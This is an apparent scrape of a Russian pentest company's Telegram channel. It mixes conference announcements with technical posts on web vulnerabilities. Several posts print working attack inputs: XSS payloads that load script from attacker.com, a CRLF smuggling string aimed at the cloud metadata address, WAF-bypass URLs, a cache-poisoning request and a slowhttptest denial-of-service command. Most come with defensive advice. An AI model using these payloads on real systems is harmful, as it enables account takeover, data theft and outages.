M
METASCAN News & PoC
@metascan_news
27.05.2026 14:42
Фронтенд веб-приложения часто содержит ценные данные, которые помогают глубже понять его архитектуру и выявить нестандартные уязвимости. В этом материале разберём несколько методов анализа фронтенд-кода.

🔑 Утечки API-ключей и токенов

Ключи и токены, попавшие в клиентские скрипты, могут привести к серьёзным последствиям при их использовании в злонамеренных целях. Для их обнаружения применяются наборы регулярных выражений. Некоторые инструменты автоматизируют этот процесс, используя типичные паттерны поиска.

1. SecretFinder — Python-скрипт позволяющий обнаруживать чувствительные данные в JavaScript файлах
python3 SecretFinder.py -i https://example.com/1.js -o results.html

2. JSMiner — расширение на Java, может находить в том числе строки с высокой энтропией.

3. Шаблонные проверки через Scan checks:
metadata:
language: v1-beta
name: "SecretFinder"
description: "SecretFinder"

given response then
if {latest.response} matches "(access[_-]?[t|T]oken(=| =|:| :|\":)) ..." then
report issue:
severity: high
confidence: firm
detail: "Secret found"
end if


⚙️ Извлечение путей из JavaScript

Для корректной работы приложения в JavaScript-файлах часто можно найти URL, используемые для взаимодействия с бэкендом. Однако не всегда такие функции имеют достаточный уровень защиты или предназначены для открытого доступа. Для обнаружения подобных путей можно использовать специализированные инструменты.

1. LinkFinder — Python скрипт для извлечения абсолютных или относительный путей из JavaScript файлов:
python linkfinder.py -i https://example.com -d

2. Кatana — краулер на Go который обладает функциями парсинга JavaScript:
katana -u https://example.com -js-crawl

Или использовать в связке с jsluice — но в этом случае возрастёт потребление памяти.

3. Jsluice — инструмент на Go который умеет извлекать URL, пути, секреты и другие полезные данные:
jsluice urls jquery.js | jq


💻 Сбор путей SPA (Single-page Application)

Распространенные веб-приложения с использованием таких фреймворков как NextJS, React, Vue.js, Angular имеют свои особенности которые позволяют использовать их для сбора информации, такой как доступные пути.

1. Next.js позволяет получить список простой консольной командой:
console.log(__BUILD_MANIFEST.sortedPages)


2. Vue.js и React используют Vue / React DevTools только при условии если приложение использует фреймворки в режиме разработки:
console.log($r.props.children); // для React, необходимо <Router> / <Routes> во вкладке компонентов


3. Nuxt.js (Vue) и SvelteKit
console.log(window.__NUXT__?.config.public);
// или по структуре путей / страницы
console.log(useNuxtApp().$router.getRoutes().map(r => r.path));


В составе модулей METASCAN используется Zap с расширением для поиска утечек API ключей, токенов и других чувствительных данных на основе регулярных выражений, а сбор ссылок из файлов скриптов осуществляется с помощью Katana, что позволяет максимально покрывать проверяемое приложение.

#Metascan #pentest #redteam #Metascan_news
🔥 8
👍 6
👏 2
1
8 262
M
METASCAN News & PoC
@metascan_news
27.05.2026 08:59
METASCAN News & PoC Видео: «ПЕРИМЕТР» прошёл. Спасибо всем, кто был с нами! мая МЕТАСКАН впервые провела первую конференцию для экспертов в области ИБ. 📹 Смотрите атмосферный ролик о том, как это было! ⬆️ 🔥 Было жарко не только на улице! На сцене разбирали сетевые протоколы, реальные кейсы по захвату устройств и свежую статистику по уязвимостям корпоративных инфраструктур. Говорили о том, как AI помогает пентесту, почему классические подходы к защите перестают работать, как деприоритизировать шум в потоке CVE и о многом другом. Отдельный доклад был посвящён привлечению инвестиций в ИБ-стартапы. 🎮 Помимо сцены, нас радовали интерактивные зоны: lockpicking, эксперименты с RFID и NFC, соревновательный OSINT. А ретро-зона с ZX Spectrum, Commodore 64, Amiga и турниром по DOOM II стала разрядкой после плотной экспертной программы. Спасибо нашим партнёрам и спикерам из Сбера, Xello, MITIGATOR, Kaspersky, Selectel, Indeed и других компаний за участие, экспертизу и живое общение. И конечно, спасибо каждому участнику. За вопросы, за энергию, за то, что выбрали «ПЕРИМЕТР». 📸 Фото с конференции уже готовы! Забирайте, ищите себя и знакомых. Галерея 1 Галерея 2 Хэштег: #МЕТАСКАН_ПЕРИМЕТР Конференция закончилась, но это только начало. Следите за новостями в этом канале. Ваш МЕТАСКАН
M
METASCAN News & PoC
@metascan_news
27.05.2026 08:33
«ПЕРИМЕТР» прошёл. Спасибо всем, кто был с нами!

мая МЕТАСКАН впервые провела первую конференцию для экспертов в области ИБ.

📹 Смотрите атмосферный ролик о том, как это было! ⬆️

🔥 Было жарко не только на улице! На сцене разбирали сетевые протоколы, реальные кейсы по захвату устройств и свежую статистику по уязвимостям корпоративных инфраструктур. Говорили о том, как AI помогает пентесту, почему классические подходы к защите перестают работать, как деприоритизировать шум в потоке CVE и о многом другом. Отдельный доклад был посвящён привлечению инвестиций в ИБ-стартапы.

🎮 Помимо сцены, нас радовали интерактивные зоны: lockpicking, эксперименты с RFID и NFC, соревновательный OSINT. А ретро-зона с ZX Spectrum, Commodore 64, Amiga и турниром по DOOM II стала разрядкой после плотной экспертной программы.

Спасибо нашим партнёрам и спикерам из Сбера, Xello, MITIGATOR, Kaspersky, Selectel, Indeed и других компаний за участие, экспертизу и живое общение.
И конечно, спасибо каждому участнику. За вопросы, за энергию, за то, что выбрали «ПЕРИМЕТР».

📸 Фото с конференции уже готовы! Забирайте, ищите себя и знакомых.
Галерея 1
Галерея 2

Хэштег: #МЕТАСКАН_ПЕРИМЕТР

Конференция закончилась, но это только начало. Следите за новостями в этом канале.

Ваш МЕТАСКАН
❤‍🔥 13
👍 8
🤝 2
🔥 1
6 291
M
METASCAN News & PoC
@metascan_news
26.05.2026 14:49
Какие процессы ИБ уже пора автоматизировать

Во многих компаниях сотрудники ИБ до сих пор тратят огромное количество времени на рутину: разбор алертов, проверки, управление доступами и однотипные инциденты. Проблема в том, что без автоматизации нагрузка растёт быстрее, чем команды.

Завтра, 27 мая, в 11:00 в эфире AM Live Давид Ордян, генеральный директор МЕТАСКАН, обсудит с экспертами из других компаний, какие процессы информационной безопасности действительно стоит автоматизировать уже сейчас.

— где автоматизация даёт максимальный эффект
— какие задачи можно безопасно отдавать AI и ML
— почему многие проекты автоматизации “не взлетают”
— как измерять эффективность автоматизации
— и нужен ли вообще "человеческий контроль” в ИБ

Регистрируйтесь на эфир по ссылке
❤‍🔥 6
🔥 5
3 297
M
METASCAN News & PoC
@metascan_news
21.05.2026 10:56
МЕТАСКАН«ПЕРИМЕТР» уже завтра!

Конференция пройдёт 📅 22 мая в Москве.

«ПЕРИМЕТР» — это пространство для практиков. Инженеры ИБ, исследователи уязвимостей и разработчики собственных инструментов встретятся, чтобы обсудить кейсы и поделиться опытом.

Если вы ещё не зарегистрировались, сейчас самое время. Участие бесплатное, но нужна регистрация.

ЗАРЕГИСТРИРОВАТЬСЯ

Программу конференции и другие подробности можно найти в канале, посвящённому мероприятию: @METASCAN_PERIMETER

Обратите внимание на изменения в сетке докладов: передвинули на более ранее время то, что может быть вам особо интересно.

Вас ждут экспертные доклады отMETASCAN, Сбера, Xello, MITIGATOR и других практиков ИБ.

В 17:40 в главном зале выступит директор крупнейшего в Европе венчурного фонда ранних стадий (ФРИИ)Дмитрий Калаев. Дмитрий расскажет о том, что фонды ожидают от молодых команд, как привлечь финансирование и насколько страшно иметь дела с венчурными фондами. Если вы задумываетесь о проекте в сфере кибербезопасности или хотите понять логику венчурных фондов — этот доклад для вас.

До встречи на «ПЕРИМЕТРЕ»!

📍 Место: Москва, Дворец Культур, ул. Шарикоподшипниковская, 15, стр. 1 (м. Дубровка)
🔥 5
👍 2
👌 2
🤝 2
11 518
M
METASCAN News & PoC
@metascan_news
20.05.2026 13:26
Все новости, анонсы и материалы конференции МЕТСКАН«ПЕРИМЕТР» теперь в одном месте!

Подписывайтесь:
@METASCAN_PERIMETER

В канале будем:

Представлять спикеров и анонсы докладов;

Публиковать актуальное расписание и напоминать про активности;

Делиться новостями и итоговыми материалами;

Оперативно сообщать об изменениях.

А ещё в чате канала всегда можно задать вопрос или оставить обратную связь.

О конференции коротко

В деловой части запланированы выступления экспертов METASCAN, а также партнёров — СБЕРа, Xello и MITIGATOR.

Помимо деловой программы, гостей ждут соревнования по OSINT-разведке, хак-станции, локпикинг и эксперименты с RFID/NFC. Будет и зона отдыха с ретро-компьютерами, турнир по DOOM II и чилаут-зона с большим экраном.

ЗАРЕГИСТРИРОВАТЬСЯ НА КОНФЕРЕНЦИЮ
*Участие бесплатное, но требуется предварительная регистрация.

📍 Москва, Дворец Культур, ул. Шарикоподшипниковская, д. 15, стр. 1
🚇 м. Дубровка
🤝 6
❤‍🔥 5
🏆 3
5 425
M
METASCAN News & PoC
@metascan_news
07.05.2026 10:18
CVE-2026-40175: загрязнение прототипа в Axios

Уязвимость CVE-2026-40175 затрагивает версии Axios ниже 1.15.0 и относится к классу CRLF-инъекция (CWE-113) с возможностью построения цепочки атак через request smuggling и SSRF.

Её особенность в том, что это не самостоятельная уязвимость, а вспомогательный механизм, который позволяет превратить уже существующее загрязнение прототипа (prototype pollution) в используемых проектом внешних библиотеках в полноценную сетевую атаку.

Axios при формировании запроса выполняет слияние конфигураций (merge Config), которые включают в себя HTTP-заголовки. При этом используется стандартный обход свойств JavaScript-объекта, затрагивающий цепочку прототипов (prototype chain).

При вызове функции
JavaScript

const api = axios.create({
baseURL: 'https://api.com',
headers: { 'X-App': 'my-app' }
})

api.get('/users', {
headers: { Authorization: 'Bearer token' }
})


Аксиос собирает следующий запрос:
GET https://api.com/users
Headers:
X-App: my-app
Authorization: Bearer token


Если злоумышленник смог загрязнить Object.prototype, добавив лишние свойства в базовый объект JavaScript, то эти свойства автоматически подхватятся и попадут в HTTP-запрос, который сформирует Axios.


Object.prototype['x-test'] = "value"
axios.get("https://target")


В уязвимых версиях Axios некорректно реализована проверка значений заголовков на наличие CRLF-инъекции (\r\n) — очистка опасных символов выполнялась только в конце строки, а не во всём значении. Это позволяет отправить контрабандный запрос через загрязнение прототипа и CRLF-инъекцию.
Пример:

Object.prototype['x-amz-target'] = "a\r\n\r\nPUT /latest/api/token HTTP/1.1\r\nHost: 169.254.169.254\r\n..."

Цепочка эксплуатации выглядит следующим образом:

🔹Для эксплуатации требуется наличие возможности загрязнения прототипа в приложении.

🔹Axios при сборке запроса в mergeConfig подхватывает загрязнённый прототип.

🔹CRLF-инъекция приводит к разрыву запроса и отправке контрабандного запроса.

🔹Контрабандный запрос приводит к успешной эксплуатации SSRF и получению доступа к внутренним сервисам.

Изначально этой уязвимости эксперты дали максимальную оценку в 10.0 по шкале CVSS (Common Vulnerability Scoring System — система оценки критичности уязвимостей), потому что смотрели на всю цепочку атак целиком, но после уточнения вектора атаки её снизили до 4.8.

В связи со сложностью эксплуатации и необходимостью выполнения ряда условий, уязвимость CVE-2026-40175 не представляет столь серьёзной угрозы, как предполагалось изначально. Тем не менее, наши специалисты уже проанализировали периметр клиентов и уведомили их о наличии уязвимых версий Axios, а в Metascan добавлен шаблон для выявления уязвимых серверов.

#Metascan #pentest #redteam #Metascan_news
👍 3
💯 3
2
2 524
M
METASCAN News & PoC
@metascan_news
05.05.2026 12:31
Межсайтовый скриптинг (XSS) остается распространённой уязвимостью, несмотря на современные средства защиты веб-приложений. В этом посте мы покажем нетипичные техники и способы обхода, которые позволяют выявлять XSS в самых неочевидных местах.

📲 Служебные поля почты и телефона

Малоизвестный способ внедрить XSS — через служебные поля в номерах телефонов и адресах электронной почты. Эти возможности прописаны в технических стандартах: для телефонов это поле phone-context (RFC5341), для email — комментарии в самом адресе (RFC2822 и RFC822).

Например, в номер телефона можно добавить такой код:
79999999999;phone-context=<script>alert()</script>

Если система некорректно обрабатывает такие поля, вредоносный код может быть выполнен. Разработчики редко проверяют эти места, поэтому XSS легко пропустить при тестировании.

Для внедрения в комментарии к почте можно использовать такие полезные нагрузки:
email="><script>alert()</script>"@example.com // инъекция через комментарий
email=user+(alert())@example.com
email=user@example(alert()).com

Большинство веб-приложений работают на фреймворках, которые поддерживают стандарты RFC. Поэтому велика вероятность, что приложение обработает служебные поля телефона и почты, как описано выше. Но если разработчик не очистит эти скрытые параметры от потенциально опасных символов, злоумышленник сможет внедрить код.

Еще одно из редко проверяемых мест для инъекции — это значения заголовков. В частности, User-Agent. Значение этого заголовка позволяет находить слепые XSS, потому что оно может сохраняться в логах панелей аналитики или административных интерфейсов. Если там не настроена очистка данных, код может выполниться при просмотре логов администратором:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:150.0) Gecko/20100101 Firefox/150.0"><script/src=//attacker.com></script>


💻 Обходы защиты


WAF (Web Application Firewall) часто применяется как основной метод предотвращения XSS, но полагаться только на этот способ защиты крайне не рекомендуется, так как одна слабость в регулярном выражении (regex) может привести к полному обходу защиты.

В одном из таких случаев наш специалист обошел защиту с удалением необходимых тэгов через такую полезную нагрузку:
https://vulnerable.example.com/?param=%3Csscriptcript%3Ealert(12345)%3C!--


Типичные способы внедрения не подходили. Обойти защиту было возможно только понимая её логику: тэг "script" удалялся, а закрывающий тэг блокировался приложением, поэтому для обхода достаточно было спрятать еще один тэг, разбив его на 2 и добавив комментарий в конце строки.

Еще один случай обхода стал возможен благодаря комбинации символов "[]()!+":
https://vulnerable.example.com/?param=%3Csvg%20onload=[][(!+...[]]])%3E

Здесь используется метод обфускации JavaScript кода который позволяет обойти ограничения связанные с определенными символами, что и произошло в этом случае.

Технические специалисты METASCAN часто проверяют системы, где WAF используется как основное средство защиты, и доказывают его уязвимость с помощью практических эксплойтов. Вывод один: уязвимости необходимо устранять на уровне кода, а не надеяться на правила WAF.

#Metascan #pentest #redteam #Metascan_news
🔥 7
👍 6
🤝 4
6 471
M
METASCAN News & PoC
@metascan_news
04.05.2026 14:14
Напоминаем, что 22 мая мы будем рады увидеть вас на конференции Периметр, посвященной наступательной информационной безопасности

Конференция бесплатная, но требуется регистрация.

💥 Доклады и круглый стол 

Раздался стук 
Конкретные цифры о состоянии сетей и уязвимостях внешнего периметра корпоративных инфраструктур Рунета

Блеск и нищета сетевого сканирования 
Как работать с unknown и ' ' протоколами при анализе сетевой инфраструктуры

AI in-the-loop 
Как использование генеративного AI в связке с привычными инструментами приводит к обнаружению новых уязвимостей

Huge Impact 25-26  
О находках на внешних периметрах, которые приводили к наибольшему ущербу за прошедний год и том, как они были сделаны
- Захватываем кассовые аппараты
- Опять Bitrix (RCE в кастомных доработках Bitrix)
- Ищем иголку в стоге сена магистральных провайдеров
- Большой брат (Захват систем видеонаблюдения)
- Секретный доклад

А также доклады от Партнёров конференции - Сбербанк, Xello, Mitigator, Indeed

🚩 Активности
Lockpicking (физический взлом замков)
RFID и NFC-эксперименты
Соревновательный OSINT
Конкурс по обходу фильтров антифишинга

🎮 Демосцена и Ретро-компьютинг
Ретро-компьютеры ZX Spectrum, Commodore 64, Commodore Amiga, Микроша, Atari
Показ лучших intro и demo
Турнир по DOOM II

🔗 ССЫЛКА НА РЕГИСТРАЦИЮ

22 мая 2026 10:00
Москва, Дворец Культур, ул. Шарикоподшипниковская д.15 стр.1
Метро Дубровка (Салатовая ветка, низ)
🔥 7
🤝 4
👍 3
1
73 865
M
METASCAN News & PoC
@metascan_news
27.04.2026 13:37
👾Атаки на веб-кэш: как стандартный функционал приводит к утечке персональных данных

Технология кэширования применяется повсеместно. Однако неверная конфигурация может привести к критическими уязвимостями: от утечки API-ключей и токенов доступа до раскрытия персональных данных.

Обман кэша (Cache Deception)

Если кэширующие механизмы веб-сервера настроены некорректно, злоумышленник может реализовать такой сценарий атаки:

🔹 Идентифицировать эндпоинты, возвращающие критическую информацию. Например: /api/v1/api_token.

🔹 Сформировать ссылку с использованием расширения, которое кэшируется согласно конфигурации веб-сервера: https://vulnerable-site.com/api/v1/api_token/file.css.

🔹 Как только жертва перейдёт по ссылке, веб-сервер вернёт стандартный контент для этого эндпоинта, но кэширующий сервер, идентифицировав запрашиваемый файл как .css, создаст кэш-копию страницы с тем содержимым, которое было доставлено жертве.

🔹 После этого атакующий может снова запросить ту же ссылку. Кэширующий сервер вернёт сохранённую копию, в которой будет и секретный ключ жертвы.

Громкий случай подобной атаки затронул крупнейшего провайдера ИИ-решений — ChatGPT от OpenAI. В результате эксплуатации подобной уязвимости был возможен полный захват аккаунта жертвы.

Отравление кэша (Cache Poisoning)

Атаки на кэш не ограничиваются утечкой данных, они также применяются для доставки вредоносного кода — это называется отравлением кэша. Суть в том, что при обработке запроса веб приложения могут отображать значения заголовков в содержимом страницы, среди таких:

User-Agent
Cookie
X-Forwarded-Host
X-Host
X-Forwarded-Server
X-Forwarded-Scheme
X-Original-URL (Symfony)
X-Rewrite-URL (Symfony)

Доставить полезную нагрузку в значении заголовка жертве напрямую невозможно, однако злоумышленник может воспользоваться особенностями кэширования, чтобы выполнить атаку. Для этого достаточно сформировать запрос вида:

GET /test?buster=123 HTTP/1.1
Host: vulnerable-host.com
X-Forwarded-Host:
test"><script>alert(1)</script>

В ответ сервер вернёт страницу с внедрённым кодом, сохранив её в кэше:

HTTP/1.1 200 OK
Cache-Control: public, no-cache
...
<meta property="og:image"
content="https://test"><script>alert(1)</script>">

После этого атакующему остаётся только отправить жертве ссылку на закэшированную страницу: https://vulnerable-host.com/test?buster=123. При переходе кэширующий сервер отдаст сохранённую вредоносную копию, и внедрённый JavaScript-код сработает в браузере жертвы.

Предотвращение атак на кэш

Для защиты от подобных атак рекомендуется:

🔹 применять надёжные регулярные выражения для правил кэширования на стороне сервера;

🔹 использовать для динамических страниц заголовки Cache-Control
со значениями no-store и private;

🔹 убедиться, что CDN-сервер не перезаписывает критически важные правила кэширования, заданные на бэкенде.

Специалисты METASCAN готовы провести аудит ваших веб-сервисов на предмет уязвимостей данного класса и предоставить рекомендации по их устранению.

#Metascan #pentest #redteam #Metascan_news
🔥 5
👍 4
👀 2
1
3 507
M
METASCAN News & PoC
@metascan_news
24.04.2026 08:38
METASCAN News & PoC Фото: 🛸 «МЕТАСКАН ПЕРИМЕТР» — конференция для инженеров и руководителей, отвечающих за безопасность внешнего периметра. Приглашаем SOC, Red Team, CISO, архитекторов ИБ и ИТ-директоров — тех, кто влияет на практику безопасности. 📍 22 мая 2026, Москва, Дворец Культур (м. Дубровка) Офлайн. Участие бесплатное, по предварительной регистрации. 🔗 Зарегистрироваться на конференцию Что вас ждёт на «ПЕРИМЕТРЕ»: 📑 Экспертные доклады и стенды, круглый стол о будущем кибербеза и живой разговор с CISO. 🚩Активности: соревнования по OSINT-разведке, скоростному решению капч, созданию фишинговых писем, а ещё RFID квест и лекция по локпикингу. 🎮 Чилл и ретро: чиптюн, ретро-консоли, игровые поединки, чилаут-демозона с большим экраном. Приходите обмениваться экспертизой и находить профессиональные контакты #Metascan #Metascan_Perimetr #Metascan_news
M
METASCAN News & PoC
@metascan_news
20.04.2026 12:58
SlowHTTP: Уязвимость «на страже» доступности

Пока исследователи охотятся за критическими уязвимостями, ошибки конфигурации веб-серверов нередко остаются без внимания. Одна из таких ошибок делает сервер уязвимым для атаки SlowHTTP.

Атака SlowHTTP эксплуатирует фундаментальное ограничение архитектуры веб-серверов — конечный размер пула активных соединений. Принцип атаки заключается в захвате и удержании доступных слотов пула с минимальной интенсивностью передачи данных. До тех пор, пока соединение не будет разорвано по таймауту, оно блокирует выделенный слот, лишая сервер возможности обрабатывать запросы легитимных пользователей.

Злоумышленник открывает соединение и начинает отправлять HTTP-запрос частями: сначала строку GET / HTTP/1.1, затем заголовки - по одному, с паузами. Финальная последовательность \r\n\r\n, сигнализирующая серверу о завершении запроса, намеренно не отправляется. Сервер не может определить, завершил ли клиент передачу, и продолжает ждать, удерживая соединение открытым. При масштабировании этой схемы все доступные слоты пула оказываются заняты, а легитимные пользователи получают ошибку 504 Gateway Timeout.

Основные виды атаки

Slowloris (Slow HTTP Headers)
— клиент открывает соединение и бесконечно отправляет HTTP-заголовки, намеренно не завершая запрос финальным \r\n\r\n. Сервер ждёт окончания заголовочного блока и поддерживает соединение с клиентом.
Slow POST — в заголовке Content-Length объявляется большой объём данных (например, 1 000 000 байт), а тело запроса отправляется по байту в минуту. Это заставляет сервер дождаться всего тела прежде чем обработать запрос.
Slow Read — клиент отправляет легитимный HTTP-запрос, но намеренно объявляет маленький размер TCP-окна (к примеру, 28 байт) в начальном SYN-пакете. Сервер передает первые 28 байт и вынужден остановиться, так как клиент возвращает win 0 (буфер заполнен). Сервер продолжает периодически опрашивать клиента о доступном месте в буфере. Общее время удержания соединения в таком состоянии может достигать 2 минут. Все это время соединение остается открытым и слот в пуле занят. Тысячи таких соединений приводят к отказу в обслуживании.


Как проверить свой проект

Для проверки уязвимости к SlowHTTP можно использовать утилиту Slowhttptest. Это специализированный инструмент, который имитирует медленные атаки и показывает, как сервер на них реагирует.

Пример команды:
slowhttptest -c 1000 -H -g -o slowloris_stats -i 10 -r 200 -t GET -u https://target.com -x 24 -p 3

Если через минуту сервис перестал отвечать — уязвимость найдена.

Как защититься

Защита строится на ограничении времени ожидания и количества соединений:

1. Таймауты в Nginx — необходимо установить жёсткие рамки на чтение заголовков и тела запроса.
client_body_timeout 10s;
client_header_timeout 10s;

2. Лимиты соединений — ограничить количество одновременных подключений с одного IP.
3. Reverse Proxy — использовать Nginx или HAProxy перед бэкендом. Nginx буферизует входящие запросы и не передаёт их дальше до полного получения.
4. Модуль mod_reqtimeout для Apache — позволяет установить таймауты на приём заголовков и тела запроса. Если клиент слишком медленно отправляет данные, соединение разрывается.

Сканер METASCAN выявляет серверы, уязвимые для SlowHTTP. Наши эксперты регулярно подтверждают наличие этой проблемы в инфраструктуре клиентов.

#Metascan #pentest #redteam #Metascan_news
🔥 7
👍 5
💯 2
1 3 571
M
METASCAN News & PoC
@metascan_news
15.04.2026 13:28
🛸 «МЕТАСКАН ПЕРИМЕТР» — конференция для инженеров и руководителей, отвечающих за безопасность внешнего периметра.

Приглашаем SOC, Red Team, CISO, архитекторов ИБ и ИТ-директоров — тех, кто влияет на практику безопасности.

📍 22 мая 2026, Москва, Дворец Культур (м. Дубровка)
Офлайн. Участие бесплатное, по предварительной регистрации.

🔗 
Зарегистрироваться на конференцию

Что вас ждёт на «ПЕРИМЕТРЕ»:

📑 Экспертные доклады и стенды, круглый стол о будущем кибербеза и живой разговор с CISO.

🚩Активности: соревнования по OSINT-разведке, скоростному решению капч, созданию фишинговых писем, а ещё RFID квест и лекция по локпикингу.

🎮 Чилл и ретро: чиптюн, ретро-консоли, игровые поединки, чилаут-демозона с большим экраном.

Приходите обмениваться экспертизой и находить профессиональные контакты


#Metascan #Metascan_Perimetr #Metascan_news
🔥 11
👍 5
❤‍🔥 4
🤝 1
🤗 1
55 1.6K
M
METASCAN News & PoC
@metascan_news
14.04.2026 09:57
🚩 Обнаружение 0-day с Метаскан: BDU:2025-14398

Эксперты METASCAN выявили 0-day уязвимость на платформе «ОЛИМПОКС», предназначенной для обучения работников предприятий.

Уязвимость была обнаружена в результате автоматического сканирования периметра одного из наших клиентов и подтверждена экспертами в процессе верификации выявленных угроз.

Найденная уязвимость зарегистрирована в БДУ ФСТЭК России и опубликована под идентификатором BDU:2025-14398.

Эксплуатация BDU:2025-14398 позволяет подменять контент страницы, проводить фишинговые атаки и осуществлять захват аккаунтов пользователей платформы. Суть уязвимости — в отсутствии надлежащей защиты структуры веб-страницы, что позволяет выполнять атаки вида «межсайтовый скриптинг» (XSS): злоумышленник посылает жертве ссылку вида:
https://example.org/login?username=<script src=//attacker.com></script>
Когда пользователь перейдет по ссылке, он увидит обычную аутентификацию на сервис, но при аутентификации все данные будут отправлены злоумышленнику и он получит доступ к учётной записи.

По международным стандартам оценки CVSS 2.0 (Common Vulnerability Scoring System), BDU:2025-14398 получила рейтинг 6,4, по CVSS 3.1 — 6,1 (средний уровень опасности).

Для устранения этой уязвимости необходимо обновить ПО «ОЛИМПОКС» или «ОЛИМПОКС: Предприятие» до версии 5.5.0 и выше. Информация об обновлении доступна на сайте разработчика.

Также наши инженеры Red Team выявили группу 0-day уязвимостей в российском ПО, для которых были зарегистрированы идентификаторы:

- BDU:2024-06203 (Carbon Billing 5)
- BDU:2024-06546 (Calltouch)
- BDU:2024-04635 (R7 Офис)
- BDU:2024-03626 (Vinteo Client)

В ходе наших тестирований мы регулярно находим ранее неизвестные уязвимости. Прямо сейчас в процессе регистрации и устранения находится новая уязвимость в ПО с открытым исходным кодом — ESM.sh.

Эксперты METASCAN готовы проанализировать ваше приложение или ПО для тщательного поиска и обнаружения уязвимостей, в том числе 0-day.

#Metascan #pentest #redteam #Metascan_news
🔥 8
🏆 6
👍 2
🙈 1
3 677
M
METASCAN News & PoC
@metascan_news
10.04.2026 15:40
🏁 Race Сondition: когда ошибки реализации ломают приложение

SAST и DAST сканеры ловят почти все простые ошибки в коде. Но есть уязвимость, которая не щадит ни опытных программистов, ни нейросети — Race Сondition, или состояние гонки.

Что это? Состояние, когда система думает, что запросы идут по очереди, а они приходят одновременно. В результате это может привести к двойному списанию денег, множественной активации одного и того же промокода, подбору паролей в обход лимита на количество попыток.

В новой статье разбираем на примерах:
— классический TOCTOU
— гонки в API
— опасную работу с файлами

И главное — как это можно исправить.

🔗 Читайте статью

#Metascan #pentest #redteam #Metascan_news
👍 7
🔥 5
👏 2
4 493
M
METASCAN News & PoC
@metascan_news
09.04.2026 11:18
📲 Уязвимости SMS-рассылок и как от них защититься

Отправки SMS встречаются на самых разных сайтах и используются для множества задач: регистрации, восстановления пароля, рассылки промокодов, аутентификации, подтверждения платежей — и множества других важных операций.

При недостаточной защите таких рассылок появляются серьёзные риски. Например, злоумышленник может подобрать код и получить доступ к чужому аккаунту, а вы сожжёте весь баланс на отправку SMS и ваши номера попадут в спам-списки.

Мы в Metascan уже не раз успешно находили подобные уязвимости, которые грозили значительными рисками — так мы помогли нашим клиентам избежать финансовых и репутационных потерь, связанных с отправкой SMS-рассылок.

🔓 Один из таких сценариев позволял использовать группу слабостей в реализации SMS-рассылки и получить доступы к чужим аккаунтам:

1. Отсутствие рейт-лимита на отправку SMS
POST /api/v1/sms_send
{"phone": 79999999999}

Несмотря на то, что пользователь видит сообщение о возможности повторной отправки SMS только спустя определённое время, при отправке запроса напрямую сервер всё равно принимает его и отправляет новую SMS.


2. Амплификация кода в одном HTTP-запросе
POST /api/v1/sms_confirm
{"code": 0000, "code": 0001, "code": 0002, "code": 0003, ...}

Иногда приложение может обрабатывать несколько кодов за раз в одном HTTP-запросе, что позволяет обойти некоторые проверки на стороне сервера.

3. В комбинации первой и второй уязвимостей можно отослать большое количество SMS и снизить объём необходимых попыток до минимума, в результате чего злоумышленник может обойти проверку SMS-кода и захватить аккаунт пользователя.

📌 Как показывает наша практика, уязвимости в отправке и проверке SMS-кодов до сих пор повсеместны. Мы выделили две ключевых проблемы и способы их решения:

1. Неограниченная отправка SMS
Необходимо убедиться, что все запросы проверяются на стороне сервера, а не только в интерфейсе. К таким проверкам относятся:
• капча
• уникальные CSRF-токены
• ограничение по времени на повторную отправку SMS
• ограничение на отправку множественных SMS на разные номера с одного IP
• инвалидация предыдущего кода при отправке нового
• срок жизни кода — 5 минут или меньше

2. Недостаточная проверка ввода SMS-кода
Функции подтверждения кода могут быть подвержены различным проблемам. Важно осуществлять корректные проверки:
• валидация рейт-лимита на стороне сервера с временным интервалом
• проверка одного кода за раз (предотвращение амплификации)
• не допускать использование одного и того же кода для разных действий
• корректная обработка параллельных запросов (гонок)
• успешный ввод кода должен проверяться на сервере до назначения сессии
• обработка номера по RFC 5341 — без обхода лимитов через служебные поля

Несмотря на простоту отправок SMS, в таких рассылках присутствует много тонкостей, которые стоит учитывать, чтобы не допустить использования особенностей этого функционала злоумышленниками.

#Metascan #pentest #redteam #Metascan_news
🔥 7
👀 6
👍 4
5 458
M
METASCAN News & PoC
@metascan_news
09.04.2026 07:46
🎬 Ловите запись вчерашнего эфира в гостях у

⚡️В эфире Давид Ордян вместе с другими экспертами обсудили:

— Как понять, что без полноценного процесса управления уязвимостями в компании уже не обойтись и что чаще всего тормозит внедрение этого процесса;

— Когда достаточно сканера и менеджера задач, а когда нужна платформа, какие интеграции с VM-платформой дают заметный эффект и как построить VM в гибридной среде;

— Как выстроить приоритизацию и не утонуть в уязвимостях, как проверить, что уязвимость действительно устранена и как быть с легаси, где устранить уязвимость невозможно;

— Где автоматизация помогает, а где создаёт риски и какие из задач VM можно доверить ИИ;

— Что оказывается самым сложным в VM на практике, какие ключевые тренды станут определяющими на ближайшие годы и какие подходы к VM сегодня уже не работают.

Смотрите запись эфира там, где удобно:

emoji VK video

emoji YouTube

emoji RuTube

#Metascan #Metascan_new
🔥 10
4
🤝 3
8 343
M
METASCAN News & PoC
@metascan_news
08.04.2026 09:14
Разбираем, как построить Vulnerability Management без лишней сложности в гостях у

Когда компания доходит до внедрения VM, быстро возникает вопрос: достаточно ли сканера и задачника или без отдельной платформы уже не обойтись? И где та граница, после которой процесс начинает разваливаться без автоматизации?

Сегодня, 8 апреля в 15:00 во второй части эфира AM Live Давид Ордян, генеральный директор Метаскан, вместе с ИБ-экспертами разберут, какие инструменты и интеграции действительно помогают выстроить рабочий Vulnerability Management.

Что обсудят:
— Когда достаточно сканера и ITSM, а когда уже нужна VM-платформа
— Какие интеграции дают реальный эффект
— Что оказывается самым сложным на практике: люди, процессы или инструменты

Регистрируйтесь на эфир по ссылке

#Metascan #Metascan_news
🔥 8
👍 6
👏 3
2
7 382
M
METASCAN News & PoC
@metascan_news
03.04.2026 11:39
🔒SOP, CORS, CSP — Политики на защите вашего браузера

В современном мире информационной безопасности браузерная защита базируется на трёх ключевых политиках: SOP, CORS и CSP. Они не взаимозаменяемы, у каждой своя роль, и вместе они закрывают разные векторы атак. Часто уязвимости возникают из-за неправильной настройки этих политик.

1. SOP — Same-Origin Policy. По умолчанию браузер запрещает одному сайту читать данные с другого, но не блокирует отправку запросов.
👉 Пример: скрипт с evil.com не может прочитать вашу почту на mail.ru.

Но если сайт ослабляет SOP через document.domain или загружает сторонние скрипты без проверки, это становится уязвимостью.

То есть, даже если страница с https://app.example не может прочитать https://api.example/data, она всё ещё может отправлять формы или fetch-запросы на этот эндпоинт.
Это может позволить злоумышленнику:

